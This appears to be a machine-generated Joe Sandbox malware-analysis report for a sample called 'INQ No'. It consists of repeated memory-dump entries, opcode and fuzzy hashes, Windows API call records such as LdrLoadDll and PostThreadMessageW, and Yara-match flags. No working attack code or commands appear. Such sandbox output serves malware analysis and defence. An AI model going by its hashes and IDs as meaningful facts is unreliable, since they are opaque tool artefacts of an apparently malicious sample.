                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437866199.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_58a0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 7Z/t$RWIK$[[bb
                                                                                                                                                                            • API String ID: 0-1157992699
                                                                                                                                                                            • Opcode ID: 823fb15ce80586a32036a3960c20e9b7a47062266295bcd2202348c3d7d09678
                                                                                                                                                                            • Instruction ID: f2d482d995df14e532757a429b675f10f844c88ddeda020a9aee709c616b5723
                                                                                                                                                                            • Opcode Fuzzy Hash: 823fb15ce80586a32036a3960c20e9b7a47062266295bcd2202348c3d7d09678
                                                                                                                                                                            • Instruction Fuzzy Hash: 555118B0E1560ACFCB08CFAAC5415AEFBF2BF99310F24D42AD419E7254D7749A428F94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                            • Opcode ID: cc91966c5f5b256d7c71c02360ab7442c854103772a5f8b038f5331dccd5ff8c
                                                                                                                                                                            • Instruction ID: fe14067bbf76272488e4c7106b5dbff729eb95a8b32e0039e4669f63355a4da1
                                                                                                                                                                            • Opcode Fuzzy Hash: cc91966c5f5b256d7c71c02360ab7442c854103772a5f8b038f5331dccd5ff8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 2B21DBB1E116189BEB18CFABD85079EFBF7AFC9200F14C07AD508A6254EB340A468F51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c50ab79d782ea52f80a04c9e8d4dfd06d9f0782a6a0d6eecf8898e2b330857b1
                                                                                                                                                                            • Instruction ID: 168c19fa4c2bb9c8242f241e522d4affde7329452af7263ff06a3bbb7d05db58
                                                                                                                                                                            • Opcode Fuzzy Hash: c50ab79d782ea52f80a04c9e8d4dfd06d9f0782a6a0d6eecf8898e2b330857b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 28E119B4E002599FDB14DFA8C584AAEFBB2FF89304F248169D414AB355D730AD42CFA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8865e9091435fa073e04c32ccfe5aca0d28780a9c2f0aa291e397f516accc46b
                                                                                                                                                                            • Instruction ID: cf4ed67b6796cb66bd0b728e1313954fe50691ce236c0ef40464ac654d0ba448
                                                                                                                                                                            • Opcode Fuzzy Hash: 8865e9091435fa073e04c32ccfe5aca0d28780a9c2f0aa291e397f516accc46b
                                                                                                                                                                            • Instruction Fuzzy Hash: 86E1F7B4E002599FDB14CFA9C584AAEFBB2FF89304F248169D414AB355DB30AD41CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98f796dc63901a483dba0eb7c0f59e9c49deb77c7c51660b018f7ebc44d0c0db
                                                                                                                                                                            • Instruction ID: b359c6dc46b5a63058ee7dff151686d6fbfc097b4029a7b3f8b18e56f967612c
                                                                                                                                                                            • Opcode Fuzzy Hash: 98f796dc63901a483dba0eb7c0f59e9c49deb77c7c51660b018f7ebc44d0c0db
                                                                                                                                                                            • Instruction Fuzzy Hash: 101296B44017458BE318EF65EC4C1897FB6FB4A328B504309DA612B2E9DBB415CACF6C
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: caf07e5d50c980cb3fba9f545b6c9597e3dbfe73e83d29ceccde4e5c1d03e782
                                                                                                                                                                            • Instruction ID: df02f6eab284d72bd959e8fab76a4a40cd3c4938e2f1ba0e7a25115b14c6f5c6
                                                                                                                                                                            • Opcode Fuzzy Hash: caf07e5d50c980cb3fba9f545b6c9597e3dbfe73e83d29ceccde4e5c1d03e782
                                                                                                                                                                            • Instruction Fuzzy Hash: 11E1F7B4E002599FDB14CFA9C584AAEFBB2FF89304F248169D414AB355DB34AD41CFA4
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1ef2183614d1a4e5c190dd25f4f61723fe22ac2446b836136ecc293ed8438f11
                                                                                                                                                                            • Instruction ID: 65661fa41257735080d9ee42aefef855f3f697fecc5c3bf8efa8eb79376f2717
                                                                                                                                                                            • Opcode Fuzzy Hash: 1ef2183614d1a4e5c190dd25f4f61723fe22ac2446b836136ecc293ed8438f11
                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE11AB4E002599FDB14CFA8C584AAEFBB2FF89304F248169D414AB355DB30AD41CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2c39bcd60623ffb906c46655c77f6a70621057c84051ce4c45ae00482ced99c3
                                                                                                                                                                            • Instruction ID: 5d4823ef496970ab8b6e808756dedaa7be91c64a44aa707130490b875fc0108b
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c39bcd60623ffb906c46655c77f6a70621057c84051ce4c45ae00482ced99c3
                                                                                                                                                                            • Instruction Fuzzy Hash: 54E1D7B4E002599FDB14CFA9C584AAEBBB2FF89304F248169E414EB355D730AD41CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8e6a88dfde43e6ca64dc1d0618527cc76c612a9297372acfe18ff240b2bc7eed
                                                                                                                                                                            • Instruction ID: ec98d97fb37ee40273ad6841d375b4df966583408e5e0fe3e403ca51359f44b7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e6a88dfde43e6ca64dc1d0618527cc76c612a9297372acfe18ff240b2bc7eed
                                                                                                                                                                            • Instruction Fuzzy Hash: F5D1E5B4A00609CFDB14DF69C588AA9B7F1BF5C315F2580A8E509EB361DB31AD40CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438855955.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_78d0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:4.9%
                                                                                                                                                                            Signature Coverage:2.8%
                                                                                                                                                                            Total number of Nodes:142
                                                                                                                                                                            Total number of Limit Nodes:11

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 333 417673-41769c call 42de13 336 4176a2-4176b0 call 42e333 333->336 337 41769e-4176a1 333->337 340 4176c0-4176d1 call 42c7e3 336->340 341 4176b2-4176bd call 42e5d3 336->341 346 4176d3-4176e7 LdrLoadDll 340->346 347 4176ea-4176ed 340->347 341->340 346->347
                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004176E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2234796835-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 353 42b233-42b26f call 404933 call 42c2f3 NtClose
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 367 f12b60-f12b6c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 368 f12c70-f12c7c LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 369 f12df0-f12dfc LdrInitializeThunk
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                            • API String ID: 1836367815-224894077
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 00413CEA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                            • API String ID: 1836367815-224894077
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 38 42b5a3-42b5e4 call 404933 call 42c2f3 RtlFreeHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B5DF
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                            • String ID: !dA
                                                                                                                                                                            • API String ID: 3298025750-3330550368
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 348 42b553-42b597 call 404933 call 42c2f3 RtlAllocateHeap
                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,0041DEAB,?,?,00000000,?,0041DEAB,?,?,?), ref: 0042B592
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 358 42b5f3-42b62f call 404933 call 42c2f3 ExitProcess
                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(?,00000000,?,?,A337B7DB,?,?,A337B7DB), ref: 0042B62A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_INQ No.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 363 f12c0a-f12c0f 364 f12c11-f12c18 363->364 365 f12c1f-f12c26 LdrInitializeThunk 363->365
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_4_2_ea0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                            • API String ID: 0-2160512332
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Strings
                                                                                                                                                                            • Critical section address, xrefs: 00F45425, 00F454BC, 00F45534
                                                                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F4540A, 00F45496, 00F45519
                                                                                                                                                                            • Invalid debug info address of this critical section, xrefs: 00F454B6
                                                                                                                                                                            • double initialized or corrupted critical section, xrefs: 00F45508
                                                                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 00F45543
                                                                                                                                                                            • Critical section address., xrefs: 00F45502
                                                                                                                                                                            • corrupted critical section, xrefs: 00F454C2
                                                                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F454CE
                                                                                                                                                                            • Address of the debug info found in the active list., xrefs: 00F454AE, 00F454FA
                                                                                                                                                                            • Critical section debug info address, xrefs: 00F4541F, 00F4552E
                                                                                                                                                                            • 8, xrefs: 00F452E3
                                                                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00F454E2
                                                                                                                                                                            • Thread identifier, xrefs: 00F4553A
                                                                                                                                                                            • undeleted critical section in freed memory, xrefs: 00F4542B
